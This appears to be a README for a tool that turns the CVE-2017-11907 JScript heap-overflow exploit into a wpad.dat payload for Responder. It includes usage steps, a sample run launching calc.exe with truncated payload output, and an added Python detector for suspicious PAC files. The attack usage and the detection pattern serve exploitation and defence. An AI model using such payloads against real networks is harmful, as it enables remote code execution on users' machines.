CVE-2017-11907 WPAD.dat Generator for Responder

Usage

This script leverages the Project Zero exploit for a heap overflow vulnerability in the JScript library (CVE-2017-11907) to generate a payload for use with Responder.

  1. Generate a payload with main.py.
  2. Copy and paste the output into the WPADScript field of Responder.conf.

    test@test:~$ python3 main.py --help
    usage: main.py [-h] [-o OUT] cmd

    positional arguments:
      cmd                Command (e.g. calc.exe).

    optional arguments:
      -h, --help         show this help message and exit
      -o OUT, --out OUT  wpad.dat output path.

    test@test:~$ python3 main.py calc.exe
    …FindProxyForURL(url,host){var payload=String.fromCharCode(24931…,0);function ale…
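
For defenders, a check for PAC bodies shaped like the output above (a long String.fromCharCode list of 16-bit values inside FindProxyForURL). This is an added example, not part of this project; the function name, thresholds and both sample PAC bodies are assumptions constructed for illustration.

```python
import re

# Thresholds are assumptions for illustration; tune them against your own PAC files.
MAX_ARGS = 16     # longer numeric fromCharCode lists are unusual in proxy logic
MAX_BYTES = 8192  # assumed upper bound for a hand-written PAC file

FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(([^)]*)\)")
NUMBER = re.compile(r"0[xX][0-9a-fA-F]+|\d+")

def _to_int(tok):
    # JavaScript numeric literal (decimal or hex) to int.
    return int(tok, 16) if tok.lower().startswith("0x") else int(tok, 10)

def inspect_pac(text):
    """Return a list of findings for one PAC/wpad.dat body (empty list = nothing flagged)."""
    findings = []
    if "FindProxyForURL" not in text:
        findings.append("no FindProxyForURL entry point")
    if len(text.encode("utf-8")) > MAX_BYTES:
        findings.append("body larger than %d bytes" % MAX_BYTES)
    for match in FROM_CHAR_CODE.finditer(text):
        args = [a.strip() for a in match.group(1).split(",")]
        numeric = [_to_int(a) for a in args if NUMBER.fullmatch(a)]
        if len(numeric) > MAX_ARGS:
            findings.append("String.fromCharCode with %d numeric arguments" % len(numeric))
        if any(n > 0xFF for n in numeric):
            # Values above 0xFF are 16-bit code units, i.e. packed data rather than ASCII text.
            findings.append("String.fromCharCode with 16-bit code units")
    return findings

# Constructed sample: an ordinary proxy-selection PAC file.
BENIGN = (
    'function FindProxyForURL(url, host) {\n'
    '  if (dnsDomainIs(host, ".corp.example")) return "DIRECT";\n'
    '  return "PROXY proxy.corp.example:8080";\n'
    '}\n'
)
# Constructed sample: same outer shape as the generator output, filled with inert values.
SUSPECT = (
    "function FindProxyForURL(url,host){var payload=String.fromCharCode(%s,0);"
    "return 'DIRECT';}" % ",".join(str(0x4141 + i) for i in range(40))
)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_pac(body))
```

Run it over the wpad.dat responses your clients actually receive; a finding on a host that is not your configured proxy-configuration server is worth investigating.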

References

  1. Project Zero Write-Up (#1383)
  2. Exploiting Windows 10 in a Local Network with WPAD/PAC and JScript
  3. Microsoft Security Bulletin for CVE-2017-11907